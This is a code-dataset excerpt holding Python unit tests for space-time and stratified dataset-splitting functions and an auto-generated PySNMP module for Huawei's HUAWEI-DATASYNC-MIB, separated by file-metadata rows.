        'time': [pd.to_datetime("2016-10-01"), pd.to_datetime("2016-10-01")]
    })

    expected_test = pd.DataFrame({
        'space': ['space1', 'space2'],
        'time': [pd.to_datetime("2016-12-01"), pd.to_datetime("2016-12-01")]
    })

    assert in_time_train_set.reset_index(drop=True).equals(expected_train)
    assert out_time_test_set.reset_index(drop=True).equals(expected_test)


def test_space_time_split_dataset(test_df=df,
                                  test_df_with_new_id=df_with_new_id,
                                  test_df_only_one_point_per_id=df_only_one_point_per_id):
    train_set, intime_outspace_hdout, outtime_inspace_hdout, outtime_outspace_hdout = \
        space_time_split_dataset(dataset=test_df,
                                 train_start_date="2016-10-01",
                                 train_end_date="2016-11-01",
                                 holdout_end_date="2016-12-01",
                                 split_seed=1,
                                 space_holdout_percentage=0.5,
                                 space_column="space",
                                 time_column="time")

    expected_train = pd.DataFrame({
        'space': ['space2'],
        'time': [pd.to_datetime("2016-10-01")]
    })

    expected_intime_outspace_holdout = pd.DataFrame({
        'space': ['space1'],
        'time': [pd.to_datetime("2016-10-01")]
    })

    expected_outtime_outspace_holdout = pd.DataFrame({
        'space': ['space1'],
        'time': [pd.to_datetime("2016-11-01")]
    })

    expected_outtime_inspace_holdout = pd.DataFrame({
        'space': ['space2'],
        'time': [pd.to_datetime("2016-11-01")]
    })

    assert train_set.reset_index(drop=True).equals(expected_train)
    assert intime_outspace_hdout.reset_index(drop=True).equals(expected_intime_outspace_holdout)
    assert outtime_inspace_hdout.reset_index(drop=True).equals(expected_outtime_inspace_holdout)
    assert outtime_outspace_hdout.reset_index(drop=True).equals(expected_outtime_outspace_holdout)

    # Testing optional argument `holdout_start_date`
    train_set, intime_outspace_hdout, outtime_inspace_hdout, outtime_outspace_hdout = \
        space_time_split_dataset(dataset=test_df,
                                 train_start_date="2016-10-01",
                                 train_end_date="2016-11-01",
                                 holdout_start_date="2016-12-01",
                                 holdout_end_date="2017-01-01",
                                 split_seed=1,
                                 space_holdout_percentage=0.5,
                                 space_column="space",
                                 time_column="time")

    expected_train = pd.DataFrame({
        'space': ['space2'],
        'time': [pd.to_datetime("2016-10-01")]
    })

    expected_intime_outspace_holdout = pd.DataFrame({
        'space': ['space1'],
        'time': [pd.to_datetime("2016-10-01")]
    })

    expected_outtime_outspace_holdout = pd.DataFrame({
        'space': ['space1'],
        'time': [pd.to_datetime("2016-12-01")]
    })

    expected_outtime_inspace_holdout = pd.DataFrame({
        'space': ['space2'],
        'time': [pd.to_datetime("2016-12-01")]
    })

    assert train_set.reset_index(drop=True).equals(expected_train)
    assert intime_outspace_hdout.reset_index(drop=True).equals(expected_intime_outspace_holdout)
    assert outtime_inspace_hdout.reset_index(drop=True).equals(expected_outtime_inspace_holdout)
    assert outtime_outspace_hdout.reset_index(drop=True).equals(expected_outtime_outspace_holdout)

    # Testing new space id appearing in the holdout period
    train_set, intime_outspace_hdout, outtime_inspace_hdout, outtime_outspace_hdout = \
        space_time_split_dataset(dataset=test_df_with_new_id,
                                 train_start_date="2016-10-01",
                                 train_end_date="2016-11-01",
                                 holdout_end_date="2016-12-01",
                                 split_seed=1,
                                 space_holdout_percentage=0.5,
                                 space_column="space",
                                 time_column="time")

    expected_train = pd.DataFrame({
        'space': ['space2'],
        'time': [pd.to_datetime("2016-10-01")]
    })

    expected_intime_outspace_holdout = pd.DataFrame({
        'space': ['space1'],
        'time': [pd.to_datetime("2016-10-01")]
    })

    expected_outtime_outspace_holdout = pd.DataFrame({
        'space': ['space1', 'space3'],
        'time': [pd.to_datetime("2016-11-01"), pd.to_datetime("2016-11-01")]
    })

    expected_outtime_inspace_holdout = pd.DataFrame({
        'space': ['space2'],
        'time': [pd.to_datetime("2016-11-01")]
    })

    assert train_set.reset_index(drop=True).equals(expected_train)
    assert intime_outspace_hdout.reset_index(drop=True).equals(expected_intime_outspace_holdout)
    assert outtime_inspace_hdout.reset_index(drop=True).equals(expected_outtime_inspace_holdout)
    assert outtime_outspace_hdout.reset_index(drop=True).equals(expected_outtime_outspace_holdout)

    # Testing only one point per space id
    train_set, intime_outspace_hdout, outtime_inspace_hdout, outtime_outspace_hdout = \
        space_time_split_dataset(dataset=test_df_only_one_point_per_id,
                                 train_start_date="2016-10-01",
                                 train_end_date="2016-11-01",
                                 holdout_end_date="2016-12-01",
                                 split_seed=1,
                                 space_holdout_percentage=0.5,
                                 space_column="space",
                                 time_column="time")

    expected_train = pd.DataFrame({
        'space': ['space2'],
        'time': [pd.to_datetime("2016-10-01")]
    })

    expected_intime_outspace_holdout = pd.DataFrame({
        'space': ['space1'],
        'time': [pd.to_datetime("2016-10-01")]
    })

    expected_outtime_outspace_holdout = pd.DataFrame({
        'space': ['space3', 'space4'],
        'time': [pd.to_datetime("2016-11-01"), pd.to_datetime("2016-11-01")]
    })

    assert train_set.reset_index(drop=True).equals(expected_train)
    assert intime_outspace_hdout.reset_index(drop=True).equals(expected_intime_outspace_holdout)
    assert outtime_inspace_hdout.empty
    assert outtime_outspace_hdout.reset_index(drop=True).equals(expected_outtime_outspace_holdout)


@st.composite
def gen_stratified_test_data(draw):
    column_name_strategy = st.text(st.characters(whitelist_categories=["Lu", "Ll"]), min_size=3)
    all_column_names = draw(st.lists(column_name_strategy, min_size=3, max_size=6, unique=True))
    target_column_name = all_column_names[-1]
    column_strategies = columns(all_column_names, dtype=int)
    data_set = draw(data_frames(column_strategies, index=range_indexes(min_size=50, max_size=100)))
    num_classes = draw(st.integers(min_value=2, max_value=5))
    data_set[target_column_name] = [i % num_classes for i in range(len(data_set))]
    return data_set, target_column_name, num_classes


def assert_sample_size_per_class(data, target_column_name, expected_samples_per_class):
    count_per_class = Counter(data[target_column_name]).values()
    for count in count_per_class:
        assert abs(count - expected_samples_per_class) <= MAX_STRATIFIED_SPLIT_SIZE_DIFFERENCE


@given(sample=gen_stratified_test_data(),
       random_state=st.integers(min_value=0, max_value=100),
       test_size=st.floats(min_value=0.2, max_value=0.8))
def test_stratified_split_dataset(sample, random_state, test_size):
    expected_data, target_column_name, num_classes = sample
    train_data, test_data = stratified_split_dataset(expected_data, target_column_name, test_size=test_size,
                                                     random_state=random_state)

    total_samples = len(expected_data)
    expected_test_size = int(total_samples * test_size)
    expected_train_size = total_samples - expected_test_size
    expected_test_samples_per_class = expected_test_size / num_classes
    expected_train_samples_per_class = expected_train_size / num_classes
    data = pd.concat([train_data, test_data])

    assert abs(len(train_data) - expected_train_size) <= MAX_STRATIFIED_SPLIT_SIZE_DIFFERENCE
    assert abs(len(test_data) - expected_test_size) <= MAX_STRATIFIED_SPLIT_SIZE_DIFFERENCE
    assert_frame_equal(data, expected_data, check_like=True)
    assert_sample_size_per_class(train_data, target_column_name, expected_train_samples_per_class)
    assert_sample_size_per_class(test_data, target_column_name, expected_test_samples_per_class)
| 41.989286 | 114 | 0.618695 | 1,425 | 11,757 | 4.73614 | 0.093333 | 0.024893 | 0.074678 | 0.09957 | 0.780264 | 0.712402 | 0.679804 | 0.654764 | 0.654467 | 0.640836 | 0 | 0.066003 | 0.265459 | 11,757 | 279 | 115 | 42.139785 | 0.715493 | 0.01548 | 0 | 0.65566 | 0 | 0 | 0.096629 | 0 | 0 | 0 | 0 | 0 | 0.132075 | 1 | 0.023585 | false | 0 | 0.033019 | 0 | 0.061321 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
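The stratified tests above assert that per-class counts in the train and test frames deviate from the expectation by at most MAX_STRATIFIED_SPLIT_SIZE_DIFFERENCE. That invariant can be demonstrated with a tiny self-contained stratified splitter (a sketch of the idea only, not fklearn's implementation):

```python
from collections import defaultdict

def stratified_split(rows, labels, test_size):
    """Split row indices per class so every class contributes ~test_size to test."""
    by_class = defaultdict(list)
    for idx, label in zip(rows, labels):
        by_class[label].append(idx)
    train, test = [], []
    for members in by_class.values():
        cut = int(len(members) * test_size)  # per-class cut keeps classes balanced
        test.extend(members[:cut])
        train.extend(members[cut:])
    return train, test

rows = list(range(60))
labels = [i % 3 for i in rows]  # three balanced classes, 20 rows each
train, test = stratified_split(rows, labels, test_size=0.25)
# Each class contributes exactly 5 rows to test and 15 to train.
```

A production splitter would also shuffle within each class under a seed (the `random_state` the tests pass to `stratified_split_dataset`); the sketch skips that to keep the counting argument visible.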
483b21ad08b30ea5943694f13065a024d57d2972 | 16,637 | py | Python | pysnmp-with-texts/HUAWEI-DATASYNC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/HUAWEI-DATASYNC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/HUAWEI-DATASYNC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module HUAWEI-DATASYNC-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/HUAWEI-DATASYNC-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:43:58 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsUnion, ValueSizeConstraint, ValueRangeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsUnion", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsIntersection")
hwDatacomm, = mibBuilder.importSymbols("HUAWEI-MIB", "hwDatacomm")
NotificationGroup, ModuleCompliance, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance", "ObjectGroup")
Integer32, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter32, Unsigned32, Counter64, MibIdentifier, NotificationType, Gauge32, IpAddress, ModuleIdentity, iso, Bits, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter32", "Unsigned32", "Counter64", "MibIdentifier", "NotificationType", "Gauge32", "IpAddress", "ModuleIdentity", "iso", "Bits", "ObjectIdentity")
RowStatus, TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "RowStatus", "TextualConvention", "DisplayString")
hwDataSync = ModuleIdentity((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191))
hwDataSync.setRevisions(('2015-07-16 13:49', '2014-09-04 17:10', '2009-03-17 10:27',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    if mibBuilder.loadTexts: hwDataSync.setRevisionsDescriptions(('Add hwCfgLastSaveFailNotify .', 'The MIB module for Data sync between host and netmanager.', 'The initial revision of this MIB module .',))
if mibBuilder.loadTexts: hwDataSync.setLastUpdated('201507161349Z')
if mibBuilder.loadTexts: hwDataSync.setOrganization('Huawei Technologies Co.,Ltd.')
if mibBuilder.loadTexts: hwDataSync.setContactInfo("Huawei Industrial Base Bantian, Longgang Shenzhen 518129 People's Republic of China Website: http://www.huawei.com Email: support@huawei.com ")
if mibBuilder.loadTexts: hwDataSync.setDescription('Modified hwCfgChgTerminalID.')
class DateAndTime(TextualConvention, OctetString):
    description = "A date-time specification. field octets contents range ----- ------ -------- ----- 1 1-2 year* 0..65536 2 3 month 1..12 3 4 day 1..31 4 5 hour 0..23 5 6 minutes 0..59 6 7 seconds 0..60 (use 60 for leap-second) 7 8 deci-seconds 0..9 8 9 direction from UTC '+' / '-' 9 10 hours from UTC* 0..13 10 11 minutes from UTC 0..59 * Notes: - the value of year is in network-byte order - daylight saving time in New Zealand is +13 For example, Tuesday May 26, 1992 at 1:30:15 PM EDT would be displayed as: 1992-5-26,13:30:15.0,-4:0 Note that if only local time is known, then timezone information (fields 8-10) is not present."
    status = 'current'
    displayHint = '2d-1d-1d,1d:1d:1d.1d,1a1d:1d'
    subtypeSpec = OctetString.subtypeSpec + ConstraintsUnion(ValueSizeConstraint(8, 8), ValueSizeConstraint(11, 11), )
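The DateAndTime layout spelled out in the description above (2-octet big-endian year, then month, day, hour, minutes, seconds, deci-seconds, plus an optional 3-octet UTC offset) can be unpacked with a short stdlib-only helper; `decode_date_and_time` is an illustrative name, not part of pysnmp's API:

```python
import struct

def decode_date_and_time(octets: bytes):
    """Decode an SNMP DateAndTime value (8 or 11 octets)."""
    # Octets 1-8: year (network byte order), month, day, hour,
    # minutes, seconds, deci-seconds.
    year, month, day, hour, minute, second, deci = struct.unpack(">H6B", octets[:8])
    tz = None
    if len(octets) == 11:
        # Octets 9-11: '+'/'-' direction, then hours and minutes from UTC.
        tz = "{}{}:{}".format(chr(octets[8]), octets[9], octets[10])
    return year, month, day, hour, minute, second, deci, tz

# The example from the convention's description, "1992-5-26,13:30:15.0,-4:0":
value = struct.pack(">H6B", 1992, 5, 26, 13, 30, 15, 0) + b"-" + bytes([4, 0])
print(decode_date_and_time(value))  # (1992, 5, 26, 13, 30, 15, 0, '-4:0')
```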
hwDataSyncScalarObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 1))
hwDataSyncTableObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2))
hwDataSyncNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 3))
hwDataSyncConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 4))
hwCurrentCfgChgSeqID = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCurrentCfgChgSeqID.setStatus('current')
if mibBuilder.loadTexts: hwCurrentCfgChgSeqID.setDescription('The value of this object identifies the ID of the current configuration change. The value ranges from 0 to 65535. After the ID of the configuration change reaches the maximum value, the value of the ID starts from 1 again. After the device is restarted, the value of the ID becomes 0.')
hwCfgChgSeqIDReveralCount = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgSeqIDReveralCount.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgSeqIDReveralCount.setDescription('The value of this object identifies the cycle count of the index of configuration change table.')
hwCfgChgTableMaxItem = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgTableMaxItem.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgTableMaxItem.setDescription('The value of this object identifies the maximum number of entries in hwCfgChgTable. ')
hwCfgBaselineTime = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 20))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgBaselineTime.setStatus('current')
if mibBuilder.loadTexts: hwCfgBaselineTime.setDescription('Specifies the time of system confiuration was baseline.')
hwDataSyncGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 4, 1))
hwDataSyncScalarObjectsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 4, 1, 1)).setObjects(("HUAWEI-DATASYNC-MIB", "hwCurrentCfgChgSeqID"), ("HUAWEI-DATASYNC-MIB", "hwCfgChgSeqIDReveralCount"), ("HUAWEI-DATASYNC-MIB", "hwCfgChgTableMaxItem"), ("HUAWEI-DATASYNC-MIB", "hwCfgBaselineTime"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwDataSyncScalarObjectsGroup = hwDataSyncScalarObjectsGroup.setStatus('current')
if mibBuilder.loadTexts: hwDataSyncScalarObjectsGroup.setDescription('A collection of objects on DataSync ScalarObjects Information.')
hwCfgChgNotifyGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 4, 1, 2)).setObjects(("HUAWEI-DATASYNC-MIB", "hwCfgChgNotify"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwCfgChgNotifyGroup = hwCfgChgNotifyGroup.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgNotifyGroup.setDescription('A collection of objects on Configuration Change Information.')
hwDataSyncNotifyGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 4, 1, 3)).setObjects(("HUAWEI-DATASYNC-MIB", "hwCfgLastSaveFailNotify"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwDataSyncNotifyGroup = hwDataSyncNotifyGroup.setStatus('current')
if mibBuilder.loadTexts: hwDataSyncNotifyGroup.setDescription('A collection of objects on synchronization Configuration Notify Information.')
hwDataSyncCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 4, 2))
hwDataSyncCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 4, 2, 1)).setObjects()
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwDataSyncCompliance = hwDataSyncCompliance.setStatus('current')
if mibBuilder.loadTexts: hwDataSyncCompliance.setDescription('The compliance statement for entities that support the huawei DataSync MIB.')
hwCfgChgTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1), )
if mibBuilder.loadTexts: hwCfgChgTable.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgTable.setDescription('This table is used to record configuration changes. In this table, you can find the configuration change based on the specific index.')
hwCfgChgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1), ).setIndexNames((0, "HUAWEI-DATASYNC-MIB", "hwCfgChgSeqID"))
if mibBuilder.loadTexts: hwCfgChgEntry.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgEntry.setDescription('Entry of hwCfgChgTable.')
hwCfgChgSeqID = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgSeqID.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgSeqID.setDescription('The value of this object identifies the configuration change ID. When the configuration is changed, the sequence ID is incremented by 1.')
hwCfgChgTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 2), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgTime.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgTime.setDescription('This object indicates the configuration change time.')
hwCfgChgTerminalType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("snmp", 1), ("telnet", 2), ("netconf", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgTerminalType.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgTerminalType.setDescription('This object indicates the type of the terminal.')
hwCfgChgTerminalID = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgTerminalID.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgTerminalID.setDescription('The value of this object identifies the terminal ID.')
hwCfgChgType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("create", 1), ("modify", 2), ("delete", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgType.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgType.setDescription('This object indicates the configuration change type.')
hwCfgChgViewName = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 6), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgViewName.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgViewName.setDescription('This object indicates the name of the view in which the configuration change occurs. For the command operation, the object is the name of the view in which the command is run. For the SNMP operation, the object is the OID of the MIB table or the scalar object.')
hwCfgChgCmdID = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgCmdID.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgCmdID.setDescription('The value of this object identifies the ID of the configuration change command. For the SNMP operation, the value is 0.')
hwCfgChgDetailInfo = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 8), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCfgChgDetailInfo.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgDetailInfo.setDescription('This object indicates detailed configuration change information. For the command operation, the object is the command line. For the SNMP operation, the object is the index of the MIB table. When there are multiple indexes, the format of index1.index2.index3 is adopted.')
hwCollectTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2), )
if mibBuilder.loadTexts: hwCollectTable.setStatus('current')
if mibBuilder.loadTexts: hwCollectTable.setDescription('This table is used to enable the NMS to send the collecting script to the device to trigger the collection, and then monitor the collection status.')
hwCollectEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1), ).setIndexNames((0, "HUAWEI-DATASYNC-MIB", "hwCollectIndex"))
if mibBuilder.loadTexts: hwCollectEntry.setStatus('current')
if mibBuilder.loadTexts: hwCollectEntry.setDescription('Entry of hwCollectTable.')
hwCollectIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1, 1), Integer32())
if mibBuilder.loadTexts: hwCollectIndex.setStatus('current')
if mibBuilder.loadTexts: hwCollectIndex.setDescription('The value of this object identifies the collection index.')
hwCollectNetManageId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1, 2), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hwCollectNetManageId.setStatus('current')
if mibBuilder.loadTexts: hwCollectNetManageId.setDescription('The value of this object identifies the NMS ID.')
hwCollectOperation = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("begin", 1), ("stop", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hwCollectOperation.setStatus('current')
if mibBuilder.loadTexts: hwCollectOperation.setDescription('This object indicates the instruction for the collection operation. Default value is stop.')
hwCollectInScriptFile = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 255))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hwCollectInScriptFile.setStatus('current')
if mibBuilder.loadTexts: hwCollectInScriptFile.setDescription('This object indicates the name of the script file. T he length of the file name ranges from 1 character to 255 characters.')
hwCollectInResultFile = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 255))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hwCollectInResultFile.setStatus('current')
if mibBuilder.loadTexts: hwCollectInResultFile.setDescription('This object indicates the name of the result file. The length of the file name ranges from 1 character to 255 characters.')
hwCollectState = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("idle", 1), ("collecting", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwCollectState.setStatus('current')
if mibBuilder.loadTexts: hwCollectState.setDescription('This object indicates the collection status.')
hwCollectRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 2, 1, 7), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hwCollectRowStatus.setStatus('current')
if mibBuilder.loadTexts: hwCollectRowStatus.setDescription('This object indicates the row status.')
hwCfgChgNotify = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 3, 1)).setObjects(("HUAWEI-DATASYNC-MIB", "hwCurrentCfgChgSeqID"), ("HUAWEI-DATASYNC-MIB", "hwCfgChgSeqIDReveralCount"), ("HUAWEI-DATASYNC-MIB", "hwCfgChgTableMaxItem"), ("HUAWEI-DATASYNC-MIB", "hwCfgBaselineTime"))
if mibBuilder.loadTexts: hwCfgChgNotify.setStatus('current')
if mibBuilder.loadTexts: hwCfgChgNotify.setDescription('This trap is generated when a configuration change occurs on the device within a specified period.')
hwCfgLastSaveFailNotify = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 3, 2))
if mibBuilder.loadTexts: hwCfgLastSaveFailNotify.setStatus('current')
if mibBuilder.loadTexts: hwCfgLastSaveFailNotify.setDescription('The last save operation failed, please check the configuration.')
mibBuilder.exportSymbols("HUAWEI-DATASYNC-MIB", hwDataSyncNotifications=hwDataSyncNotifications, hwCfgChgNotifyGroup=hwCfgChgNotifyGroup, DateAndTime=DateAndTime, hwDataSync=hwDataSync, hwCollectIndex=hwCollectIndex, hwDataSyncScalarObjectsGroup=hwDataSyncScalarObjectsGroup, hwCfgChgSeqID=hwCfgChgSeqID, hwCollectState=hwCollectState, hwCfgBaselineTime=hwCfgBaselineTime, hwCfgChgViewName=hwCfgChgViewName, hwDataSyncScalarObjects=hwDataSyncScalarObjects, hwCfgChgType=hwCfgChgType, hwCfgChgCmdID=hwCfgChgCmdID, hwCfgChgEntry=hwCfgChgEntry, hwCollectTable=hwCollectTable, hwDataSyncConformance=hwDataSyncConformance, hwCfgChgTerminalID=hwCfgChgTerminalID, hwCurrentCfgChgSeqID=hwCurrentCfgChgSeqID, hwCollectEntry=hwCollectEntry, hwCollectNetManageId=hwCollectNetManageId, hwCfgChgDetailInfo=hwCfgChgDetailInfo, hwCollectInScriptFile=hwCollectInScriptFile, hwCfgChgTable=hwCfgChgTable, hwCollectInResultFile=hwCollectInResultFile, PYSNMP_MODULE_ID=hwDataSync, hwDataSyncNotifyGroup=hwDataSyncNotifyGroup, hwDataSyncTableObjects=hwDataSyncTableObjects, hwCfgChgNotify=hwCfgChgNotify, hwCollectOperation=hwCollectOperation, hwCfgChgSeqIDReveralCount=hwCfgChgSeqIDReveralCount, hwCfgLastSaveFailNotify=hwCfgLastSaveFailNotify, hwCfgChgTableMaxItem=hwCfgChgTableMaxItem, hwDataSyncCompliance=hwDataSyncCompliance, hwDataSyncCompliances=hwDataSyncCompliances, hwCfgChgTime=hwCfgChgTime, hwCfgChgTerminalType=hwCfgChgTerminalType, hwDataSyncGroups=hwDataSyncGroups, hwCollectRowStatus=hwCollectRowStatus)
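Every object above is registered under a numeric OID tuple. As a quick illustration (plain Python, independent of pysnmp; the helper name is made up here), such tuples can be rendered in the usual dotted notation:

```python
def oid_to_str(oid):
    """Render an OID tuple such as (1, 3, 6, 1, ...) in dotted notation."""
    return ".".join(str(part) for part in oid)

# The OID declared for the hwCfgChgSeqID column above:
print(oid_to_str((1, 3, 6, 1, 4, 1, 2011, 5, 25, 191, 2, 1, 1, 1)))
# 1.3.6.1.4.1.2011.5.25.191.2.1.1.1
```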
| 129.976563 | 1,499 | 0.77508 | 2,032 | 16,637 | 6.34498 | 0.184055 | 0.054914 | 0.096099 | 0.011169 | 0.458776 | 0.314202 | 0.26239 | 0.253859 | 0.207942 | 0.207787 | 0 | 0.068588 | 0.099116 | 16,637 | 127 | 1,500 | 131 | 0.791633 | 0.019956 | 0 | 0.042373 | 0 | 0.09322 | 0.319588 | 0.011843 | 0.008475 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.059322 | 0 | 0.101695 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
483ea9c4afcf9c24247487d5e928c59c68b673d7 | 982 | py | Python | src/compas_rhino/artists/pointartist.py | funkchaser/compas | b58de8771484aa0c6068d43df78b1679503215de | [
"MIT"
] | 235 | 2017-11-07T07:33:22.000Z | 2022-03-25T16:20:00.000Z | src/compas_rhino/artists/pointartist.py | funkchaser/compas | b58de8771484aa0c6068d43df78b1679503215de | [
"MIT"
